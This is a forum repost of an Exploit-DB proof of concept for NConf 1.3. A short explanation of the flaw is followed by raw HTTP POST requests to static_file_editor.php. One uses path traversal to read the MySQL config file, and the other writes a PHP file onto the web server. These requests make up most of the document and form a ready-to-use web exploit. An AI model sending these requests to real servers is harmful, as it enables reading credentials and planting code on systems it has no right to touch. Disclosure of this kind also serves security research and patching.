Exploit NConf 1.3 - Arbitrary File Creation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24270
Проверка EDB
  1. Пройдено
Автор
HAIDAO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2013-01-21
NConf 1.3 - Arbitrary File Creation
Код:
# Exploit Title:  nconf  file read and wrtite exploit 
# Date: 2013/1/20
# Exploit Author: haidao,[email protected]
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Version:    nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos)  PHP/5.3.3
 

nconf can modify the config file of nagios and save it to the server,but haven't check the file's direction and name  ,so we can  read and write any files in the server under the privileges of apache,

1,read the file or direction , change the directory or filename ,when filename is null , you get a list of the directory,

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
 
directory=static_cfg&filename=../config/mysql.php



2, write the content into the file .
attation: if the magic_quote is on ,, u must attation the ' and ",of course we can bypass it .

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
directory=static_cfg&filename=s.php&action=Save&content=<?php phpinfo();?>
 
Источник
www.exploit-db.com

Похожие темы